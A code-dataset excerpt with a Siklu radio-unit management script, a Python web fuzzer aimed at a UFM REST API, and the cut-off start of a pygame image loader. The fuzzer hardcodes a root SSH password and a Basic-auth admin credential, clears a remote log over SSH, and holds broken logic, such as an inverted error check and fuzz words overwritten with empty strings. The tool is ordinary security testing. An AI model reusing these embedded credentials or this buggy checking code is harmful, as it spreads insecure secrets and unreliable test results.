r\"2\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+[\\w-]+\\s+[\\w]+\\s+([\\w]+)\"),\n ]\n\n\nclass ShowRF(SikluCommandParserBase):\n cmd = 'show rf'\n cmd_params = [SikluCommandParam('rf_operational', '', r\"rf operational\\s+: (.+)\\n\"),\n SikluCommandParam('rf_cinr', '', r\"rf cinr\\s+: (.+)\\n\"),\n SikluCommandParam('rf_rssi', '', r\"rf rssi\\s+: (.+)\\n\"),\n SikluCommandParam('rf_frequency', '', r\"rf [tx-]*?frequency\\s+: (.+)\\n\"),\n SikluCommandParam('rf_mode', '', r\"rf mode\\s+: (.+)\\n\"),\n SikluCommandParam('rf_role', '', r\"rf role\\s+: (.+)\\n\"),\n SikluCommandParam('rf_tx_asymmetry', '', r\"rf tx-asymmetry\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowRFStatus(SikluCommandParserBase):\n cmd = 'show rf operational'\n cmd_params = [SikluCommandParam('rf_operational', '', r\"rf operational\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowRFDebug(SikluCommandParserBase):\n cmd = 'show rf-debug'\n cmd_params = [SikluCommandParam('cinr_low', '', r\"rf-debug cinr-low\\s+: (.+)\\n\"),\n SikluCommandParam('link_length', '', r\"rf-debug link-length\\s+: (.+)\\n\"),\n SikluCommandParam('tx_temp', '', r\"rf-debug tx-temperature\\s+: (.+)\\n\"),\n SikluCommandParam('rx_temp', '', r\"rf-debug rx-temperature\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowRSSI(SikluCommandParserBase):\n cmd = 'show rf rssi'\n cmd_params = [SikluCommandParam('rf_rssi', '', r\"rf rssi\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowLicense(SikluCommandParserBase):\n cmd = 'show license'\n cmd_params = [SikluCommandParam('data_rate_status', '', r\"license\\s+data-rate\\s+status\\s+:\\s+(.+)\\n\"),\n SikluCommandParam('data_rate_permission', '', r\"license\\s+data-rate\\s+permission\\s+:\\s+(.+)\\n\"),\n ]\n\n\nclass ShowRing(SikluCommandParserBase):\n\n def __init__(self, connection=None, ring_num=1):\n SikluCommandParserBase.__init__(self, connection)\n self.ring_num = ring_num\n self.cmd = 'show ring %d' % self.ring_num\n self.cmd_params = [SikluCommandParam('ring_number', self.ring_num, ''),\n SikluCommandParam('ring-id', '', r\"ring \\d ring-id\\s+: (.+)\\n\"),\n SikluCommandParam('type', '', r\"ring \\d type\\s+: (.+)\\n\"),\n SikluCommandParam('role', '', r\"ring \\d role\\s+: (.+)\\n\"),\n SikluCommandParam('parent-ring', '', r\"ring \\d parent-ring\\s+: (.+)\\n\"),\n SikluCommandParam('cw-port', '', r\"ring \\d cw-port\\s+: (.+)\\n\"),\n SikluCommandParam('acw-port', '', r\"ring \\d acw-port\\s+: (.+)\\n\"),\n SikluCommandParam('raps-cvid', '', r\"ring \\d raps-cvid\\s+: (.+)\\n\"),\n SikluCommandParam('state', '', r\"ring \\d state\\s+: (.+)\\n\"),\n SikluCommandParam('last-state-time', '', r\"ring \\d last-state-time\\s+: (.+)\\n\"),\n SikluCommandParam('cw-status-data', '', r\"ring \\d cw-status-data\\s+: (.+)\\n\"),\n SikluCommandParam('acw-status-data', '', r\"ring \\d acw-status-data\\s+: (.+)\\n\"),\n SikluCommandParam('cw-status-raps', '', r\"ring \\d cw-status-raps\\s+: (.+)\\n\"),\n SikluCommandParam('acw-status-raps', '', r\"ring \\d acw-status-raps\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowMngVLAN(SikluCommandParserBase):\n cmd = 'show bridge-port c3 eth1 pvid'\n cmd_params = [SikluCommandParam('eth1_pvid', '', r\"bridge-port c3 eth1 pvid\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowEth1(SikluCommandParserBase):\n cmd = 'show eth eth1 eth-act-type'\n cmd_params = [SikluCommandParam('eth1_act_type', '', r\"eth eth1 eth-act-type\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowEth2(SikluCommandParserBase):\n cmd = 'show eth eth2 eth-act-type'\n cmd_params = [SikluCommandParam('eth2_act_type', '', r\"eth eth2 eth-act-type\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowEth3(SikluCommandParserBase):\n cmd = 'show eth eth3 eth-act-type'\n cmd_params = [SikluCommandParam('eth3_act_type', '', r\"eth eth3 eth-act-type\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowBU(SikluCommandParserBase):\n cmd = 'show base-unit'\n cmd_params = [SikluCommandParam('self_mac', '', r\"base-unit self-mac\\s+: (.+)\\n\"),\n SikluCommandParam('ssid', '', r\"base-unit ssid\\s+: (.+)\\n\"),\n SikluCommandParam('password', '', r\"base-unit password\\s+: (.+)\\n\"),\n SikluCommandParam('frequency', '', r\"base-unit frequency\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowTU(SikluCommandParserBase):\n cmd = 'show terminal-unit'\n cmd_params = [SikluCommandParam('self_mac', '', r\"terminal-unit self-mac\\s+: (.+)\\n\"),\n SikluCommandParam('bu_mac', '', r\"terminal-unit base-unit-mac\\s+: (.+)\\n\"),\n SikluCommandParam('ssid', '', r\"terminal-unit ssid\\s+: (.+)\\n\"),\n SikluCommandParam('password', '', r\"terminal-unit password\\s+: (.+)\\n\"),\n SikluCommandParam('frequency', '', r\"terminal-unit frequency\\s+: (.+)\\n\"),\n SikluCommandParam('tx_mcs', '', r\"terminal-unit tx-mcs\\s+: (.+)\\n\"),\n SikluCommandParam('rssi', '', r\"terminal-unit rssi\\s+: (.+)\\n\"),\n SikluCommandParam('signal_quality', '', r\"terminal-unit signal-quality\\s+: (.+)\\n\"),\n SikluCommandParam('connect_time', '', r\"terminal-unit connect-time\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowRemoteTU(SikluCommandParserBase):\n cmd = 'show remote-terminal-unit'\n\n def __init__(self, connection=None):\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(tu_num) for tu_num in range(1, 9)] for item in\n sublist]\n\n def gen_cmd_params(self, tu_num):\n return [SikluCommandParam('tu_num_%d' % tu_num, tu_num, r\"\"),\n SikluCommandParam('eth_port_%d' % tu_num, '', r\"remote-terminal-unit %d eth-port\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('mac_%d' % tu_num, '', r\"remote-terminal-unit %d mac\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('name_%d' % tu_num, '', r\"remote-terminal-unit %d name\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('status_%d' % tu_num, '', r\"remote-terminal-unit %d status\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('tx_mcs_%d' % tu_num, '', r\"remote-terminal-unit %d tx-mcs\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('rssi_%d' % tu_num, '', r\"remote-terminal-unit %d rssi\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('signal_quality_%d' % tu_num, '',\n r\"remote-terminal-unit %d signal-quality\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('tx_sector_%d' % tu_num, '',\n r\"remote-terminal-unit %d tx-sector\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('rem_tx_sector_%d' % tu_num, '',\n r\"remote-terminal-unit %d rem-tx-sector\\s+: (.+)\\n\" % tu_num),\n ]\n\n\nclass ShowLLDPRemote(SikluCommandParserBase):\n cmd = 'show lldp-remote'\n\n def __init__(self, connection=None):\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(eth_num) for eth_num in range(0, 5)] for item in\n sublist]\n\n def gen_cmd_params(self, eth_num):\n return [\n SikluCommandParam('chassis_id_%d' % eth_num, '',\n r\"lldp-remote eth%d [\\d]{1} chassis-id\\s+: (.+)\\n\" % eth_num),\n SikluCommandParam('port_descr_%d' % eth_num, '',\n r\"lldp-remote eth%d [\\d]{1} port-descr\\s+: (.+)\\n\" % eth_num),\n SikluCommandParam('sys_name_%d' % eth_num, '', r\"lldp-remote eth%d [\\d]{1} sys-name\\s+: (.+)\\n\" % eth_num),\n SikluCommandParam('sys_descr_%d' % eth_num, '',\n r\"lldp-remote eth%d [\\d]{1} sys-descr\\s+: (.+)\\n\" % eth_num),\n ]\n\n\nclass ShowRfStatisticsDaily(SikluCommandParserBase):\n cmd = 'show rf statistics-summary-days'\n multiline = True\n\n def __init__(self, connection=None):\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(day) for day in range(0, 32)] for item in sublist]\n\n def gen_cmd_params(self, day):\n return [\n # SikluCommandParam('date_%d' % eth_num, '', r\"lldp-remote eth%d [\\d]{1} chassis-id\\s+: (.+)\\n\" % eth_num),\n # SikluCommandParam('min_rssi_%d' % eth_num, '', r\"lldp-remote eth%d [\\d]{1} port-descr\\s+: (.+)\\n\" % eth_num),\n # SikluCommandParam('min_cinr_%d' % eth_num, '', r\"lldp-remote eth%d [\\d]{1} sys-name\\s+: (.+)\\n\" % eth_num),\n SikluCommandParam('min_mod_%d' % day, '',\n r\"^%d\\s+[\\.\\d]+\\s+[:\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+([\\w\\d]+)\\s+[\\w\\d]+\\s+[yesno]+\" % day),\n ]\n\n\nclass ShowRfStatisticsSummary(SikluCommandParserBase):\n multiline = True\n columns = ['interval', 'start_ts', 'min-rssi', 'max-rssi', 'min-cinr', 'max-cinr', 'min-mod', 'max-mod']\n\n def __init__(self, connection=None):\n self.cmd = 'show rf statistics-summary'\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(time_interval) for time_interval in range(0, 96)]\n for item in sublist]\n\n def gen_cmd_params(self, time_interval):\n return [\n SikluCommandParam('record_%d' % time_interval, '',\n r\"^(%d\\s+[\\.\\d]+\\s+[:\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[\\w\\d\\s\\.]+\\s{2,}[\\w\\d\\s\\.]+\\s{2,}[yesnounknown]+)\" % time_interval),\n ]\n\n def parse_reply(self):\n stats = []\n for param in self.cmd_params:\n interval_values = self.find_value(param.regex, self.reply)\n # import pdb; pdb.set_trace()\n if interval_values:\n r = re.search(\n r\"(\\d+)\\s+([\\.\\d]+\\s+[:\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([\\w\\d\\s\\.]+)\\s{2,}([\\w\\d\\s\\.]+)\",\n interval_values)\n if r:\n r = r.groups()\n stats.append(\n [int(r[0]), datetime.strptime(r[1], '%Y.%m.%d %H:%M:%S'), int(r[2]), int(r[3]), int(r[4]),\n int(r[5]), r[6], r[7]])\n else:\n continue\n\n return pd.DataFrame(stats, columns=self.columns)\n\n def __str__(self):\n return ','.join(self.columns)\n\n\nclass ShowRfStatisticsSummaryLast(SikluCommandParserBase):\n columns = ['valid_line', 'min-rssi', 'min-cinr', 'min-mod']\n multiline = True\n\n def __init__(self, connection=None):\n self.cmd = 'show rf statistics-summary'\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in\n [self.gen_cmd_params(time_interval) for time_interval in range(95, -1, -1)] for item in\n sublist]\n\n def gen_cmd_params(self, time_interval):\n return [\n SikluCommandParam('record_%d' % time_interval, '',\n r\"^(%d\\s+[\\.\\d]+\\s+[:\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[\\w\\d]+\\s+[\\w\\d]+\\s+[yesno]+)\" % time_interval),\n ]\n\n def parse_reply(self):\n valid_line = 95\n for param in self.cmd_params:\n interval_values = self.find_value(param.regex, self.reply)\n # import pdb; pdb.set_trace()\n if interval_values:\n r = re.search(\n r\"(\\d+)\\s+([\\.\\d]+\\s+[:\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([\\w\\d]+)\\s+([\\w\\d]+)\",\n interval_values)\n if r:\n r = r.groups()\n if int(r[0]) == valid_line:\n return [int(r[0]), int(r[2]), int(r[4]), r[6]]\n else:\n valid_line = int(r[0]) - 1\n else:\n continue\n\n return [\"\", \"\", \"\", \"\"]\n\n def __str__(self):\n return ','.join(self.columns)\n\n\nclass ShowEthStatisticsSummary(SikluCommandParserBase):\n multiline = True\n columns = ['interval', 'start_ts', 'interface', 'in-octets', 'out-octets', 'in-rate', 'out-rate', 'util']\n\n def __init__(self, connection=None, eth='eth1'):\n self.cmd = 'show eth %s statistics-summary' % eth\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(time_interval) for time_interval in range(0, 96)]\n for item in sublist]\n\n def gen_cmd_params(self, time_interval):\n return [\n SikluCommandParam('record_%d' % time_interval, '',\n r\"^(%d\\s+[\\.\\d]+\\s+[:\\d]+\\s+eth\\d\\s+[\\d]+\\s+[\\d]+\\s+[\\d]+\\s+[\\d]+\\s+[\\d]+)\" % time_interval),\n ]\n\n def parse_reply(self):\n stats = []\n # print self.reply\n for param in self.cmd_params:\n interval_values = self.find_value(param.regex, self.reply)\n # print param.regex\n # import pdb; pdb.set_trace()\n if interval_values:\n r = re.search(\n r\"(\\d+)\\s+([\\.\\d]+\\s+[:\\d]+)\\s+(eth[\\d])\\s+([\\d]+)\\s+([\\d]+)\\s+([\\d]+)\\s+([\\d]+)\\s+([\\d]+)\",\n interval_values)\n if r:\n r = r.groups()\n stats.append(\n [int(r[0]), datetime.strptime(r[1], '%Y.%m.%d %H:%M:%S'), r[2], int(r[3]), int(r[4]), int(r[5]),\n int(r[6]), int(r[7])])\n else:\n continue\n\n return pd.DataFrame(stats, columns=self.columns)\n\n def __str__(self):\n return ','.join(self.columns)\n\n\n#######################################################################################\ndef scan_unit(unit, commands):\n status = [unit.host, 'scan', True]\n\n for command in commands:\n command.set_connection(unit)\n status += command.parse()\n\n return status\n\n\ndef copy_sw_unit(unit, command):\n try:\n status = unit.send_command(command.replace('upload_sw', 'copy'), no_wait=True)\n status = [unit.host, 'copy', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'copy', False, str(e)]\n\n return status\n\n\ndef run_sw_unit(unit, accept_timeout=600, rollback_timeout=600):\n try:\n status = unit.send_command('copy running-configuration startup-configuration')\n status = unit.send_command('run sw next-rst %d' % accept_timeout)\n status = unit.send_command('set rollback timeout %d' % rollback_timeout)\n status = [unit.host, 'run_sw', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'run_sw', False, str(e)]\n\n return status\n\n\ndef accept_unit(unit):\n try:\n status = unit.send_command('accept sw')\n status = [unit.host, 'accept', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'accept', False, str(e)]\n\n return status\n\n\ndef copy_script_unit(unit, command):\n try:\n status = unit.send_command(command.replace('upload_script', 'copy'), no_wait=True)\n status = [unit.host, 'upload_script', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'upload_script', False, str(e)]\n return status\n\n\ndef run_script_unit(unit, command):\n try:\n status = unit.send_command(command.replace('run_script', 'run'), no_wait=True)\n status = [unit.host, 'run_script', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'run_script', False, str(e)]\n\n return status\n\n\ndef run_command_unit(unit, command):\n try:\n status = unit.send_command(command.replace('run_command ', ''), no_wait=True)\n status = [unit.host, 'run_command', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'run_command', False, str(e)]\n\n return status\n\n\n##############################################################################\ndef run_command(unit_):\n unit = unit_['unit']\n command = unit_['command']\n\n if not unit.connected:\n unit.connect()\n\n if unit.connected:\n if command.startswith('upload_sw'):\n status = copy_sw_unit(unit, command)\n elif command.startswith('run_sw'):\n status = run_sw_unit(unit, accept_timeout=600, rollback_timeout=600)\n elif command.startswith('accept'):\n status = accept_unit(unit)\n elif command.startswith('scan'):\n commands = unit_['scan_commands']\n status = scan_unit(unit, commands)\n elif command.startswith('upload_script'):\n status = copy_script_unit(unit, command)\n elif command.startswith('run_script'):\n status = run_script_unit(unit, command)\n elif command.startswith('run_command'):\n status = run_command_unit(unit, command)\n else:\n status = [unit.host, command, False, 'Invalid command']\n else:\n status = [unit.host, 'scan', False, 'No connection']\n\n ts = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime())\n s = ','.join([ts] + [str(x) for x in status])\n return s\n\n\ndef units_manager_parallel(hosts, RINGS=3, MH_ENABLED=False, N_PROCESSES=10):\n units = []\n\n # add scan commands here\n scan_commands = [ShowInventory(), ShowSystem(), ShowNTP(),\n ShowSyslog(), ShowSNMPManager(), ShowSNMPAgent(),\n ShowRfStatisticsSummaryLast(),\n ShowSW(), ShowRF(), ShowRFDebug(), ShowLicense(),\n ShowMngVLAN(), ShowEth1(), ShowEth2(), ShowEth3(), ShowLLDPRemote()] \\\n + [ShowRing(ring_num=n + 1) for n in range(RINGS)] \\\n + [ShowRfStatisticsDaily(), ]\n\n if MH_ENABLED:\n scan_commands += [ShowBU(), ShowTU(), ShowRemoteTU()]\n\n for i, host in hosts.iterrows():\n unit = SikluUnit(host['ip'], host['user'], host['password'])\n units.append({'unit': unit, 'command': host['command'], 'scan_commands': scan_commands})\n\n ts = time.strftime('%d%m%Y_%H%M', time.localtime())\n filename = 'execution_log_%s.csv' % ts\n\n file_header = 'time_stamp,host,command,command_status,' + ','.join(str(command) for command in scan_commands) + '\\n'\n\n pool = Pool(processes=N_PROCESSES)\n replies = pool.map(run_command, units)\n pool.close()\n pool.join()\n\n fid = open(filename, 'w')\n fid.write(file_header)\n fid.write('\\n'.join(replies))\n return filename\n","sub_path":"siklu_api.py","file_name":"siklu_api.py","file_ext":"py","file_size_in_byte":28777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284711031","text":"import requests\nimport os\nimport argparse\nimport logging\nimport re\nimport paramiko\n\n# from non standard directory\nfrom beautifultable import BeautifulTable\n\n\nclass Fuzzer:\n #TODO - Complete all fuzzing files\n base = os.getcwd().split('src')[0] + 'fuzzing_files' + os.sep\n fuzzing_payload = {'alphbets': base + 'alphbets', 'http_methods': base + 'http_methods','integer_overflow': base + 'integer_overflow'}\n # each url is a list which has this structure of list:\n # list[0] = HTTP Method\n # list[1] = URL\n # list[2] = HTTP Method params (optional)\n # list[3] = HTTP Body (optional)\n urls = {\"UFM\": [[\"GET\",\"http://ip/ufmRest/monitoring/topx\", (('object', '@@Node@@'),('attr', 'TxBW'),),\"\"], \\\n [\"GET\",\"http://ip/ufmRest/app/users\",\"\",\"\"] ,\\\n [\"GET\",\"http://ip/ufmRest/monitoring/resources\",\"\",\"\"], \\\n\n ], 'mlnx_os': []}\n REST_LOG_FILE_PATH = '/opt/ufm/log/rest_api.log'\n\n def __init__(self, fuzzing_file , product , ip):\n self.fuzzing_file = fuzzing_file\n self.product = product\n self.ip = ip\n self.session = requests.session()\n self.results_headers = ['HTTP METHOD','URL','query params','body','status code', 'elapsed time (ms)', 'LOG ERROR','Reflected']\n self.table = BeautifulTable()\n self.table.column_headers = self.results_headers\n self.init_table()\n self.results = []\n self.result_file = os.getcwd() + 'results_file.txt'\n self.shell = None\n self.init_results_file()\n self.init_ssh()\n self.fuzzer_mamager()\n\n def init_ssh(self):\n logging.debug(\"start init_ssh \")\n ip = self.ip\n ssh = self.SSHConnect(ip , 'root', '3tango')\n self.shell = self.createshell(ssh)\n\n logging.debug(\"end init_ssh\")\n\n\n def clear_rest_api_log(self):\n logging.debug(\"start clear rest api log\")\n cmd = \"echo>\" + Fuzzer.REST_LOG_FILE_PATH\n expected = \"\"\n result , output = self.run_par_cmd(cmd= cmd, expect= expected, shell= self.shell)\n if not output:\n logging.error(\"rest api log was not cleared successfully\")\n else:\n logging.debug(\"rest api log was cleared.\")\n logging.debug(\"end clear rest api log\")\n\n def check_errors_in_rest_log(self):\n cmd = 'cat ' + Fuzzer.REST_LOG_FILE_PATH + '| ' + 'grep -i ERR|CRITICAL|FAILED'\n expected = ''\n result , out = self.run_par_cmd(cmd= cmd, expect= expected, shell= self.shell)\n # result should be '0' and 'out' should be empty in this case.\n if not out:\n logging.critical(\"Errors was found in REST API log \")\n logging.critical(\"log file content after running cmd (\" + str(cmd) + \"): \" + str(out))\n return True\n else:\n logging.debug(\"REST API log has not errors\")\n return False\n\n @staticmethod\n def get_ufm_headers():\n headers = {\n 'Pragma': 'no-cache',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,he;q=0.8,it;q=0.7,es;q=0.6',\n 'Authorization': 'Basic YWRtaW46MTIzNDU2',\n 'Content-Type': 'application/json',\n 'Accept': 'application/json, text/plain, */*',\n 'Cache-Control': 'no-cache',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Connection': 'keep-alive',\n 'Referer': 'http://10.209.24.48/ufm_web/',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',\n 'Expires': 'Sat, 01 Jan 2000 00:00:00 GMT',\n }\n\n return headers\n\n def load_fuzz_list(self):\n logging.info(\"Open selected fuzzing file..\")\n try:\n filename = Fuzzer.fuzzing_payload[self.fuzzing_file]\n logging.debug(\"Fuzzing file is \" + str(filename))\n with open(filename,'r') as f:\n return [line.strip() for line in f.readlines()]\n except Exception as e:\n logging.error(\"Exception : couldn't open fuzzing file\")\n exit(1)\n logging.debug(\"load_fuzz_list ended successfully\")\n \n def clear_results_for_next_url(self):\n logging.debug(\"Clearing results for next url\")\n self.results = []\n\n #clearing beautifulTable:\n for _ in range(len(self.table)):\n del self.table[0]\n\n @staticmethod\n def SSHConnect(ip, username, passowrd):\n ssh = paramiko.SSHClient()\n logging.debug(msg=\"Open SSH Client to :\" + str(ip))\n try:\n ssh.set_missing_host_key_policy(policy=paramiko.AutoAddPolicy())\n ssh.connect(ip, port=22, username=username, password=passowrd, allow_agent=False, look_for_keys=False)\n except Exception as ex:\n logging.error(msg=\"SSH Client wasn't established!\")\n sys.exit(0)\n logging.info(msg=\"Open SSH Client to :\" + str(ip) + \"established!\")\n return ssh\n\n @staticmethod\n def createshell(ssh):\n shell = ssh.invoke_shell()\n shell.settimeout(0.5)\n shell.recv(1024)\n # time.sleep(10)\n return shell\n\n @staticmethod\n def run_par_cmd(cmd, expect, shell):\n '''\n\n :param shell:\n :param cmd: cmd command like ' show version'\n :param expect: string to look for like '\n :return: 0 if the expected string was found in output.\n '''\n # sleeping for 3 seconds to the command will be executed after shell prompt is printed.\n shell.send(cmd + '\\n')\n out = ''\n while True:\n try:\n tmp = shell.recv(1024)\n if not tmp:\n break\n except Exception as e:\n break\n out += tmp.decode(\"utf-8\")\n ansi_escape = re.compile(r'\\x1B\\[[0-?]*[ -/]*[@-~]')\n out = ansi_escape.sub('', out)\n if expect not in out:\n return (1, out)\n return (0, out)\n\n\n def add_ip_to_url(self, url):\n url = str(url).replace('ip',self.ip)\n return url\n\n \n def fuzzer_mamager(self):\n\n #Load fuzzing option:\n fuzz_words = self.load_fuzz_list()\n product_urls = Fuzzer.urls[self.product]\n for url in product_urls:\n # Before we start to fuzz we want to make sure the basic URL ends with '200' OK.\n self.validate_url(url , fuzz_word = None)\n #if basic url doesn't work i want to skip fuzzing\n if str(self.results[0][4]) == '200':\n for word in fuzz_words:\n #TODO - delete\n word = ''\n self.validate_url(url, fuzz_word=word)\n self.print_results()\n self.save_results()\n self.clear_results_for_next_url()\n else:\n logging.critical(\"request for basic url failed, skipping url: \" + str(self.results[0][1]))\n\n\n\n #response = requests.get('http://10.209.24.48/ufmRest/app/users', headers=headers)\n\n \n def validate_current_url(self,http_method, url , params, body):\n logging.debug(\"start validating current url\")\n try:\n #check which http method is required:\n if http_method == 'GET':\n if params:\n logging.debug(\"request is GET with params:\")\n r = self.session.get(url,params=params, headers= self.get_ufm_headers())\n else:\n logging.debug(\"request is GET without params:\")\n r = self.session.get(url,headers=self.get_ufm_headers())\n elif http_method =='POST':\n if body:\n logging.debug(\"request is POST wih body:\")\n r = self.session.post(url, body, headers= self.get_ufm_headers())\n else:\n logging.error(\"request method couldn't be found in validate current url\")\n\n return r\n except Exception as e:\n logging.error(\"Exception received in validate current url\" + str(e))\n return None\n\n @staticmethod\n def cls():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n def init_results_file(self):\n with open(self.fuzzing_file, 'w') as results_file:\n results_file.write('\\n')\n\n @staticmethod\n def convert_tuple_to_string(tup):\n tup_str = \"\"\n for t in tup:\n tup_str +='='.join(t)\n tup_str+=','\n tup_str = tup_str[:-1]\n return tup_str\n\n def save_results(self):\n logging.debug(\"starting save results\")\n logging.info(\"saving results of fuzzing file: \" + self.fuzzing_file)\n with open(self.fuzzing_file, 'a') as results_file:\n for row in self.results:\n for item in row:\n if isinstance(item, tuple):\n item = self.convert_tuple_to_string(item)\n results_file.write(str(item))\n results_file.write('.')\n results_file.write('\\n')\n logging.debug(\"end save results\")\n\n def print_results(self):\n #clear the screen before printing the results:\n self.cls()\n #save results into text file\n\n\n\n logging.debug(\"start print_result\")\n logging.info(\"printing all fuzzing results for url: \" + str(self.results[0][1]))\n for row in self.results:\n self.table.append_row(row)\n\n print(self.table)\n print(\"\\n\" *3)\n logging.debug(\"end print_result\")\n\n\n def parse_request_results(self,r, curent_url_type, current_params,current_body, fuzz_word):\n logging.debug(\"start parse request result\")\n try:\n result_list = []\n r_status_code = r.status_code\n r_elapsed_time = re.search('\\d*\\.{1}\\d*[0-4]', str(r.elapsed))[0]\n r_url = r.url\n r_url_type = curent_url_type\n except Exception as e:\n logging.error(\"Exception in parse_request_results\" + str(e) + \"exiting\")\n exit(1)\n\n if not current_params:\n current_params = 'N/A'\n if not current_body:\n current_body = 'N/A'\n\n #check if i received any errors in log file:\n error_in_log = self.check_errors_in_rest_log()\n if error_in_log == True:\n error_in_log = 'Yes'\n else:\n error_in_log = 'No'\n reflected = self.check_payload_reflected_in_html(r, fuzz_word)\n if reflected == True:\n reflected = 'Yes'\n else:\n reflected = 'No'\n\n result_list = [r_url_type,r_url,current_params,current_body,r_status_code,r_elapsed_time,error_in_log,reflected]\n\n\n logging.debug(\"adding result into result container\")\n self.results.append(result_list)\n logging.debug(\"end parse request result\")\n\n def check_payload_reflected_in_html(self, r, fuzz_word):\n logging.debug(\"start check payload reflected in html\")\n\n if fuzz_word is None:\n logging.debug(\"skip check of reflected XSS in base url\")\n return False\n\n if fuzz_word in r.content.decode('utf-8'):\n logging.critical(\"XSS reflected was found! fuzz_word = \" + str(fuzz_word) + \"URL = \" + str(r.url))\n return True\n else:\n logging.debug(\"XSS reflected wasn't found for URL = \" + str(r.url))\n return False\n logging.debug(\"end check payload reflected in html\")\n\n def init_table(self):\n self.table.max_table_width = 160\n for attr in self.results_headers:\n self.table.left_padding_widths[attr] = 1\n self.table.right_padding_widths[attr] = 1\n\n\n def validate_url(self, url ,fuzz_word):\n logging.debug(\"start validating basic url\")\n url_with_fuzz_sign = str(url[0]).replace(\"@@\",\"\")\n #check if url contains any parameters\n curent_url_type = url[0]\n current_url = self.add_ip_to_url(url[1])\n\n #checking if there is params for the request\n\n current_params = ''\n if url[2]:\n params = url[2]\n current_params = ()\n #params is tuple so i want to create new tuple without '@@' signs.\n first_tup_flag = True\n for tup in params:\n new_tup = ()\n if not fuzz_word:\n first, second =str(tup[0]).replace('@@',\"\") ,str(tup[1]).replace(\"@@\",'')\n else:\n first, second = str(re.sub(r'@@.*@@',fuzz_word,tup[0])),str(re.sub(r'@@.*@@',fuzz_word,tup[1]))\n\n new_tup = (first,second)\n if first_tup_flag:\n current_params = (first,second)\n first_tup_flag = False\n else:\n current_params = (current_params,new_tup)\n #check if there is body for the request\n current_body = \"\"\n if url[3]:\n if not fuzz_word:\n current_body = str(url[3]).replace(\"@@\",\"\")\n else:\n current_body = str(re.sub('@@.@@',fuzz_word,url[3]))\n #TODO - for debuggig\n #print(curent_url_type,current_url, current_params, current_body)\n logging.info(\"validate basic url before fuzzing: \" + current_url)\n r = self.validate_current_url(curent_url_type,current_url, current_params, current_body)\n self.parse_request_results(r, curent_url_type, current_params,current_body,fuzz_word)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Fuzzing tool for web applications')\n parser.add_argument('--fuzzing_type',dest='fuzzing_type', choices=['alphbets', 'http_methods', 'integer_overflow','long'], help='choose fuzzing type')\n parser.add_argument('--project',choices=['UFM','UFMAPL','NEO','MFT','HPCX'] , dest='project', help='select a project from list')\n parser.add_argument('--ip', dest='ip',help='ip of your the machine you fuzz', required=True)\n parser.add_argument('--debug', dest='debug', action='store_true', help='change to debug mode')\n\n args = parser.parse_args()\n\n if args.debug:\n level = logging.DEBUG\n else:\n level = logging.INFO\n logging.basicConfig(filename='web_fuzzer.log',\n level=level,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filemode='w')\n\n logging.info(\"Start Script...\")\n\n fuzz = Fuzzer(str(args.fuzzing_type).lower(), args.project, args.ip)\n\nif __name__ == '__main__':\n main()","sub_path":"web_fuzzer.py","file_name":"web_fuzzer.py","file_ext":"py","file_size_in_byte":14651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"61935048","text":"import os\n\nimport numpy as np\nimport pygame\n\n\nSHADOW_COLOR = (80, 80, 80)\n\n\nclass ImageHandler:\n def __init__(self):\n self.camera = np.zeros(2)\n self.scale = 100\n self.images = dict()\n self.load_images()\n self.debug_color = (255, 0, 255)\n self.font = pygame.font.Font(None, 30)\n\n def load_images(self):\n path = os.path.join('data', 'images')\n\n for r, d, f in os.walk(path):\n 